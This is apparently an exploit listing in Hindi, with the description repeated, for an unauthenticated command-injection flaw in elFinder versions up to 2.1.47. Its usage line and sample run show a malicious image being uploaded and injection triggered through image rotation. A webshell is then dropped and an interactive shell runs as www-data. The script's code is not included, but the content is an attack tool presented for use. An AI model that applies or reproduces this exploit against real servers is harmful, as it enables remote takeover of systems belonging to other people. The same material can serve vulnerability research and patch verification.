
elFinder <= 2.1.47 में PHP कनेक्टर घटक के माध्यम से कमांड इंजेक्शन भेद्यता। वेब सर्वर उपयोगकर्ता के रूप में बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन की अनुमति देता है।
elFinder <= 2.1.47 में PHP कनेक्टर घटक के माध्यम से कमांड इंजेक्शन भेद्यता। वेब सर्वर उपयोगकर्ता के रूप में बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देता है।
python3 exploit.py http://TARGET
$ python3 exploit.py http://10.10.10.10/elFinder
[*] Uploading malicious image...
[*] File uploaded, hash: l1_U2VjU2lnbmFsLmpwZw
[*] Triggering command injection via image rotation...
[*] Checking for webshell...
[+] Pwned!
[+] Interactive shell (Ctrl+C to exit)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)